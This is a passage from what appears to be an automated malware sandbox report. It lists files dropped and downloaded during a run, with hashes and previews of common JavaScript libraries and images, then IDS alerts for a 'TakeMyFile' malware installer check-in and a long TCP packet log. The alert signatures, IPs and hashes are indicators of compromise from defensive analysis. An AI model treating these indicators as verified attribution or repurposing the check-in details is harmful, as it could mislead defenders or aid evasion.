                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):512
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3::
                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                  Category:downloaded
                                                                  Size (bytes):8388
                                                                  Entropy (8bit):7.919494785399262
                                                                  Encrypted:false
                                                                  SSDEEP:192:o5n7uQqkG1FsKUGMKhipevO8FtkEqPcOq7fxJe/0N4t52:o9t/nGM2Vhtk+db20af2
                                                                  MD5:24E67BADADA3D64FD710615A5F4F82C3
                                                                  SHA1:ABF964F22FFA9EBCEFA23A807FBA31D8BB13A38C
                                                                  SHA-256:D17B828AFF5C9DD27D42456DC8352881C1401DF5C352FCE084809B799DC9E32C
                                                                  SHA-512:D870A827207568F0CC7BEBE3ABCD44FC1B56156597B829497DA344F3A08C1FFF9C33C12FFF72D9B13032748924D7C68FA785FA70C65CF23B453D3378DD661DA9
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://i1.wp.com/flevix.com/wp-content/uploads/2019/07/Focus-Loading-1.gif
                                                                  Preview:RIFF. ..WEBPVP8X...........W..ANIM..........ANMF.............W..d...VP8L..../.....$Gr.....?.p.F."U..,<.n9n.F...]....j......"D..J..-...E...PZ:>.....%.H.....lA...il.06..H..m".&N..p....!..'..kv~D60$R..m.N..}<....5...z.....Y+..1.3.3.3.Y+3..8h]..Hm......Z....aAd.38/..s.F.._LW....:vM..C.m.jsnR.".A>...............................................................................................................D:...'o.YXj..E7..;<...ht7&.6.hZ..n.....N+.......F.c.WQ..^.Rv..P..e..{.i..............R.X#h....`...Y.......&].NT....5...Pk.u.....$...`.5.;1..1D.........Z......>.).r.R...|....9..}.s./.6.!...0...7.......v[..^1.#.5 ..1T...|t%../......v..[{/.=z..U.h..k..i...F_....k*.m....;..Y..H?.'.3Xv....=..T.o...2..N...`.....&^.....B.&..1..@.U......LT.v...:.>.x........@......p..:....c..Us..L.,N.W.C..y..i..^....>v...n...;...y.E..Za>..<..]?>j...l.... ..9...(5....6.....CV.....O.O*.....=.[.eR....!#8.d.c..<..%X.e2....D.`iE.....u....>m7.....u].`..Q:......L.S.j....8.W
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (1851), with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):1851
                                                                  Entropy (8bit):5.1582905988481595
                                                                  Encrypted:false
                                                                  SSDEEP:48:Aa0SVhVeZb8pgL0UA7dBEev7N1bTQ/1xZO9I0gxzkRH:N0ch88qLJA7dBlTb0Oz
                                                                  MD5:3802B1DA574FB51C12A40FB763BCD8E1
                                                                  SHA1:FEE034CC7E18BE52EA8A12FFEFEBCB0EABCA95FF
                                                                  SHA-256:E4686A0E93C1D5BA5196E0748664BB10990C1FE115CAA50FD340AF14492C4D5C
                                                                  SHA-512:DD66826232BF950B8BD1D54846DD6D84B5EBF3867FE18A6991AEAEE34C84253D50BA5626F690B182E17AAFC57CE2774FE4AD3792823D855D7ECE8FDB51B80CB4
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/jszip-utils/0.1.0/jszip-utils.min.js
                                                                  Preview:!function(e){"object"==typeof exports?module.exports=e():"function"==typeof define&&define.amd?define(e):"undefined"!=typeof window?window.JSZipUtils=e():"undefined"!=typeof global?global.JSZipUtils=e():"undefined"!=typeof self&&(self.JSZipUtils=e())}(function(){return function o(i,f,u){function s(n,e){if(!f[n]){if(!i[n]){var t="function"==typeof require&&require;if(!e&&t)return t(n,!0);if(a)return a(n,!0);throw new Error("Cannot find module '"+n+"'")}var r=f[n]={exports:{}};i[n][0].call(r.exports,function(e){var t=i[n][1][e];return s(t||e)},r,r.exports,o,i,f,u)}return f[n].exports}for(var a="function"==typeof require&&require,e=0;e<u.length;e++)s(u[e]);return s}({1:[function(e,t,n){"use strict";var u={};function r(){try{return new window.XMLHttpRequest}catch(e){}}u._getBinaryFromXHR=function(e){return e.response||e.responseText};var s="undefined"!=typeof window&&window.ActiveXObject?function(){return r()||function(){try{return new window.ActiveXObject("Microsoft.XMLHTTP")}catch(e){}}(
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (2706)
                                                                  Category:downloaded
                                                                  Size (bytes):2749
                                                                  Entropy (8bit):5.3431938281985385
                                                                  Encrypted:false
                                                                  SSDEEP:48:KwdQuDYDQJ26GiQMbu3tykqyHIHoLx6Wg2qJZ3czSo/4NM/ADVU96l2veQFxmjvG:KLDQoaludS5Sx6BbJJcGR69Be4cj/tRq
                                                                  MD5:349C8ACA9D3D0518362D1982D08F1A0F
                                                                  SHA1:39230DC78E799B40FFEA09B3F1031DCAE953A226
                                                                  SHA-256:C68874CBAA2FD1650B7D770B328680EA765FB3376023CC3608427FDE4F0D0481
                                                                  SHA-512:425BFA5522A1D600CA1A825B9F203944C5D872F9E922A84EFBE32120CD9F4AD31C193F62D93FFFB52C18165732A1144370367E4D81E91FC6B30410B286949EAB
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/FileSaver.js/2.0.5/FileSaver.min.js
                                                                  Preview:(function(a,b){if("function"==typeof define&&define.amd)define([],b);else if("undefined"!=typeof exports)b();else{b(),a.FileSaver={exports:{}}.exports}})(this,function(){"use strict";function b(a,b){return"undefined"==typeof b?b={autoBom:!1}:"object"!=typeof b&&(console.warn("Deprecated: Expected third argument to be a object"),b={autoBom:!b}),b.autoBom&&/^\s*(?:text\/\S*|application\/xml|\S*\/\S*\+xml)\s*;.*charset\s*=\s*utf-8/i.test(a.type)?new Blob(["\uFEFF",a],{type:a.type}):a}function c(a,b,c){var d=new XMLHttpRequest;d.open("GET",a),d.responseType="blob",d.onload=function(){g(d.response,b,c)},d.onerror=function(){console.error("could not download file")},d.send()}function d(a){var b=new XMLHttpRequest;b.open("HEAD",a,!1);try{b.send()}catch(a){}return 200<=b.status&&299>=b.status}function e(a){try{a.dispatchEvent(new MouseEvent("click"))}catch(c){var b=document.createEvent("MouseEvents");b.initMouseEvent("click",!0,!0,window,0,0,0,80,20,!1,!1,!1,!1,0,null),a.dispatchEvent(b)}}var
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:data
                                                                  Category:downloaded
                                                                  Size (bytes):99112
                                                                  Entropy (8bit):5.430201357369002
                                                                  Encrypted:false
                                                                  SSDEEP:1536:dQ6MMEBdUyj5HPkDonnhkJQVdHyE7286GKvq+KQwhDsG:d6pVxOwD
                                                                  MD5:DB117D0391191DF4CD6346CD8D7B3D49
                                                                  SHA1:C1DF5C3B3207A84B827B000941DDF671C6DD1D88
                                                                  SHA-256:301F962999873267B605154AA43B886DFB3A56549D508018D55AE852613EA7C8
                                                                  SHA-512:B954958C4EF362C1B3E1A8341C4CDFBA027BF281C22352A17648AF8D0AE8F0004BFCF46210EE113B0BEBA256007199E4CB4165FDB6962988A541F5AF11296244
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/jszip/3.6.0/jszip.min.js
                                                                  Preview:/*!..JSZip v3.6.0 - A JavaScript class for generating and reading zip files.<http://stuartk.com/jszip>..(c) 2009-2016 Stuart Knightley <stuart [at] stuartk.com>.Dual licenced under the MIT license or GPLv3. See https://raw.github.com/Stuk/jszip/master/LICENSE.markdown...JSZip uses the library pako released under the MIT license :.https://github.com/nodeca/pako/blob/master/LICENSE.*/..!function(e){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{("undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this).JSZip=e()}}(function(){return function s(a,o,u){function h(r,e){if(!o[r]){if(!a[r]){var t="function"==typeof require&&require;if(!e&&t)return t(r,!0);if(f)return f(r,!0);var n=new Error("Cannot find module '"+r+"'");throw n.code="MODULE_NOT_FOUND",n}var i=o[r]={exports:{}};a[r][0].call(i.exports,function(e){var t=a[r][1][e];return h(t||e)},i,i.exports,s,
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                  Category:downloaded
                                                                  Size (bytes):1882
                                                                  Entropy (8bit):7.894935391827043
                                                                  Encrypted:false
                                                                  SSDEEP:48:/MWjgcyWpSTUxUM3JXkrkQdIFd1yNRJlMcU3FS:0Wj61wxUIJLQdIFyHJlMcb
                                                                  MD5:D91CD70685D61E4FA70111B1172620E0
                                                                  SHA1:6A0EE1A92B0FD056545C23668E342B343A18084C
                                                                  SHA-256:282A8B17D09EAD82DD62806BEDD779CBD9A7C379A6DCFFD34770D911D08904ED
                                                                  SHA-512:DE5A164EAEFCA998B5984096C7B8876BEAF8D9F0EBBF399F1EE218E7EEAD70D11E7B3CCAC976B5BFE52154388DA0FEB6CD100DA5C5E25368F2174DEF7757D3CD
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://img001.prntscr.com/file/img001/LwwKUVJ1RTKn0DIWa1bTlw.png
                                                                  Preview:RIFFR...WEBPVP8LE.../.B....6.mUY_!'uh..O..\C..m..$.........IC+.......l.:8..,]H...pg.....H~.xoe....U.dt.I..f....J,..8.B.<...&..,..d...g....&..5.......V...q...pZq.Zf`#u..&....-4...T.8n......V.Qa........z..-. .o.x..c'..c..i.d..o...H.#o.l.j.*..zK...."1.a.'..._"..m.G.....I..O..m.m....b.*P.p7{X.|=P...O.....>..."./.m#I.T..3+;.+.g../.Y..=...#.........D......,...T..2I...%G'}Dx.(}.B#.,.Q.q.J9...........+...q.......PR.Z......A.1.`... ...;#.8|D.......H}.... ....j6....s.d......D..g.....`..Y=...v.eM.m,...o..:.u....Q....2...@.....f.*. .uAc......qW.c..+s.q@!..bB...7....i.....m..%.V.,..y.f$R]#<g.....!0..#rc......b.D..X...Ju..R.n.'.u.OE>.{.t.Y.R.}z:....<S4#...C. I....1Wu..cO....y[......BP..Q..9.s....h8@..9....$..8....3..9.L".Kly.3...n.'..G.D..$.c..;.R...:..'.g...?..&.xj.d.f?.D........K.2...n.g,..k..AG-"U..T.l...N~...vk...{.q@O.>.C...O..).Z...v.=q..~.....3..8.$..(z.....Cf..6..K8W.=.^.cO...w.-&m...&.......[.\.....A...b..s.P].G... .p.&..;.....,)t....;.;)jp....*..C.v
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (65447)
                                                                  Category:downloaded
                                                                  Size (bytes):89501
                                                                  Entropy (8bit):5.289893677458563
                                                                  Encrypted:false
                                                                  SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js
                                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                  No static file info
                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  192.168.2.354.204.22.19849716802849813 04/26/23-09:01:40.583092TCP2849813ETPRO MALWARE TakeMyFile Installer Checkin4971680192.168.2.354.204.22.198
                                                                  192.168.2.354.204.22.19849716802849814 04/26/23-09:01:40.583092TCP2849814ETPRO MALWARE TakeMyFile User-Agent4971680192.168.2.354.204.22.198
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Apr 26, 2023 09:00:11.054783106 CEST49696443192.168.2.3172.67.1.225
                                                                  Apr 26, 2023 09:00:11.054872036 CEST44349696172.67.1.225192.168.2.3
                                                                  Apr 26, 2023 09:00:11.055036068 CEST49696443192.168.2.3172.67.1.225
                                                                  Apr 26, 2023 09:00:11.090673923 CEST49696443192.168.2.3172.67.1.225
                                                                  Apr 26, 2023 09:00:11.090714931 CEST44349696172.67.1.225192.168.2.3
                                                                  Apr 26, 2023 09:00:11.141469002 CEST44349696172.67.1.225192.168.2.3
                                                                  Apr 26, 2023 09:00:11.141704082 CEST49696443192.168.2.3172.67.1.225
                                                                  Apr 26, 2023 09:00:11.159183025 CEST49696443192.168.2.3172.67.1.225
                                                                  Apr 26, 2023 09:00:11.159256935 CEST44349696172.67.1.225192.168.2.3
                                                                  Apr 26, 2023 09:00:11.159797907 CEST44349696172.67.1.225192.168.2.3
                                                                  Apr 26, 2023 09:00:11.164235115 CEST49696443192.168.2.3172.67.1.225
                                                                  Apr 26, 2023 09:00:11.207472086 CEST44349696172.67.1.225192.168.2.3
                                                                  Apr 26, 2023 09:00:11.678394079 CEST44349696172.67.1.225192.168.2.3
                                                                  Apr 26, 2023 09:00:11.678538084 CEST44349696172.67.1.225192.168.2.3
                                                                  Apr 26, 2023 09:00:11.678623915 CEST49696443192.168.2.3172.67.1.225
                                                                  Apr 26, 2023 09:00:11.687735081 CEST49696443192.168.2.3172.67.1.225
                                                                  Apr 26, 2023 09:00:11.687771082 CEST44349696172.67.1.225192.168.2.3
                                                                  Apr 26, 2023 09:00:11.787820101 CEST49697443192.168.2.3172.217.168.65
                                                                  Apr 26, 2023 09:00:11.787883997 CEST44349697172.217.168.65192.168.2.3
                                                                  Apr 26, 2023 09:00:11.787960052 CEST49697443192.168.2.3172.217.168.65
                                                                  Apr 26, 2023 09:00:11.799180031 CEST49697443192.168.2.3172.217.168.65
                                                                  Apr 26, 2023 09:00:11.799211025 CEST44349697172.217.168.65192.168.2.3
                                                                  Apr 26, 2023 09:00:11.868366957 CEST44349697172.217.168.65192.168.2.3
                                                                  Apr 26, 2023 09:00:11.868491888 CEST49697443192.168.2.3172.217.168.65
                                                                  Apr 26, 2023 09:00:11.871213913 CEST49697443192.168.2.3172.217.168.65
                                                                  Apr 26, 2023 09:00:11.871241093 CEST44349697172.217.168.65192.168.2.3
                                                                  Apr 26, 2023 09:00:11.871753931 CEST44349697172.217.168.65192.168.2.3
                                                                  Apr 26, 2023 09:00:11.873740911 CEST49697443192.168.2.3172.217.168.65
                                                                  Apr 26, 2023 09:00:11.915416956 CEST44349697172.217.168.65192.168.2.3
                                                                  Apr 26, 2023 09:00:12.138149023 CEST44349697172.217.168.65192.168.2.3
                                                                  Apr 26, 2023 09:00:12.138259888 CEST44349697172.217.168.65192.168.2.3
                                                                  Apr 26, 2023 09:00:12.138354063 CEST49697443192.168.2.3172.217.168.65
                                                                  Apr 26, 2023 09:00:12.241245031 CEST49697443192.168.2.3172.217.168.65
                                                                  Apr 26, 2023 09:00:12.241297960 CEST44349697172.217.168.65192.168.2.3
                                                                  Apr 26, 2023 09:00:12.643203974 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:12.643274069 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:12.643376112 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:12.647877932 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:12.647924900 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:12.804291964 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:12.804481983 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:12.807034016 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:12.807069063 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:12.807456017 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:12.810728073 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:12.851439953 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.366651058 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.366693020 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.366739035 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.366791964 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.366846085 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.366877079 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.366915941 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.404144049 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.404213905 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.404264927 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.404305935 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.404336929 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.404359102 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.444056034 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.444094896 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.444169044 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.444204092 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.444231987 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.444255114 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.456531048 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.456571102 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.456643105 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.456680059 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.456711054 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.456738949 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.468311071 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.468347073 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.468430996 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.468471050 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.468502045 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.468537092 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.516242981 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.516282082 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.516475916 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.516511917 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.516535997 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.516578913 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.523114920 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.523154974 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.523257971 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.523293018 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.523336887 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.523361921 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.530062914 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.530127048 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.530188084 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.530220032 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.530276060 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.530277014 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.537082911 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.537112951 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.537254095 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.537286043 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.537342072 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.544457912 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.544509888 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.544574976 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.544617891 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.544637918 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.544666052 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.553818941 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.553858995 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.553972006 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.554007053 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.554105043 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.563121080 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.563222885 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.563286066 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.563321114 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.563344955 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.563368082 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.593146086 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.593204021 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.593369961 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.593400955 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.593422890 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.593480110 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.598005056 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.598036051 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.598164082 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.598192930 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.598252058 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.603612900 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.603688955 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.603782892 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.603811026 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.603833914 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.603879929 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.608081102 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.608174086 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.608253002 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.608283997 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.608308077 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.608331919 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.610224962 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.610275030 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.610357046 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.610383987 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.610407114 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.610441923 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.610850096 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.613682032 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.613742113 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.613799095 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.613822937 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.613847017 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.613950014 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.613950014 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.616256952 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.616300106 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.616436005 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.616465092 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.616552114 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.617036104 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.618886948 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.618927956 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.619071007 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.619096994 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.619184971 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.621165037 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.621206045 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.621234894 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.621421099 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.621437073 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.621522903 CEST49698443192.168.2.3185.143.234.120
                                                                  Apr 26, 2023 09:00:13.624524117 CEST44349698185.143.234.120192.168.2.3
                                                                  Apr 26, 2023 09:00:13.624555111 CEST44349698185.143.234.120192.168.2.3
